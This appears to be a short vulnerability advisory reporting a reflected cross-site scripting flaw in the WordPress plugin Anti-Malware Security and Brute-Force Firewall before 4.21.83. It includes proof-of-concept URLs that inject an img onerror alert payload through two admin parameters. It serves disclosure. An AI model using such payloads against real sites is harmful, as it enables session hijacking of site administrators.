Anti-Malware Security and Brute-Force Firewall < 4.21.83 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape some parameters before outputting them back in an admin dashboard, leading to Reflected Cross-Site Scripting

PoC

https://example.com/wp-admin/admin.php?page=GOTMLS-settings&amp;GOTMLS;_debug=<%2Fscript><img+src+onerror%3Dalert(1)%3B> Also possible with the $_GET[‘eli’] parameter: http://example.com/wp-admin/admin.php?page=GOTMLS-settings&amp;eli;=<%2Fscript><img+src+onerror%3Dalert(1)%3B>